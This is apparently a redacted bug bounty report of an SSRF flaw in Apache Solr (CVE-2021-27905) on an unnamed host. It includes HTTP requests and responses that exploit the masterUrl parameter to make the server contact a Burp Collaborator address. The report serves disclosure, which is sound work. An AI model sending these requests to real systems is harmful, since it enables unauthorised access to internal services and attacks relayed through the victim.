SSRF due to CVE-2021-27905 in www.████████

Apache Solr is vulnerable to SSRF using the parameter "masterUrl". This issue is registered as [CVE-2021-27905](https://nvd.nist.gov/vuln/detail/CVE-2021-27905). ## Impact A successful SSRF attack can often result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with. In some situations, the SSRF vulnerability might allow an attacker to perform [arbitrary command execution](https://portswigger.net/web-security/os-command-injection). An SSRF exploit that causes connections to external third-party systems might result in malicious onward attacks that appear to originate from the organization hosting the vulnerable application, leading to potential legal liabilities and reputational damage. ### Supporting Material/References https://portswigger.net/web-security/ssrf https://www.anquanke.com/post/id/238201 ## System Host(s) www.██████████ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2021-27905 ## Steps to Reproduce ## Steps To Reproduce First wee need to send this GET request ``` GET /solr/admin/cores?wt=json HTTP/1.1 Host: www.███ User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 Accept-Language: en Connection: close Accept-Encoding: gzip ``` Response ``` HTTP/1.1 200 OK Connection: close Content-Length: 1002 Cache-Control: max-age=2592000 Content-Type: text/plain;charset=UTF-8 Date: Tue, 04 May 2021 05:13:17 GMT Server: Microsoft-IIS/7.5 X-Powered-By: ARR/2.5 X-Powered-By: ASP.NET ████ ``` Now we can do a HTTP request to the target we want to test it on. I'll be using Burp Collaborator, to test it yourself, please replace the value accordingly. Request ``` GET █████████masterUrl=http://6pwo0p85qh07drdgdlr9nr9hn8tyhn.burpcollaborator.net HTTP/1.1 Host: www.███ User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 Accept-Language: en Connection: close Accept-Encoding: gzip ``` Response ``` HTTP/1.1 200 OK Connection: close Content-Length: 174 Cache-Control: no-cache, no-store Content-Type: text/xml;charset=UTF-8 Date: Tue, 04 May 2021 05:13:19 GMT Etag: "17935cb837f" Expires: Sat, 01 Jan 2000 01:00:00 GMT Last-Modified: Tue, 04 May 2021 05:13:20 GMT Pragma: no-cache Server: Microsoft-IIS/7.5 Set-Cookie: ARRAffinity=450f2c90c5749e5ead79f5f3389d0369674c71e046ba20f5151e80e68da4c908;Path=/;Domain=www.██████ X-Powered-By: ARR/2.5 X-Powered-By: ASP.NET <?xml version="1.0" encoding="UTF-8"?> <response> <lst name="responseHeader"><int name="status">0</int><int name="QTime">0</int></lst><str name="status">OK</str> </response> ``` And in Burp's collaborator we receive a HTTP request from the server: █████ ## Suggested Mitigation/Remediation Actions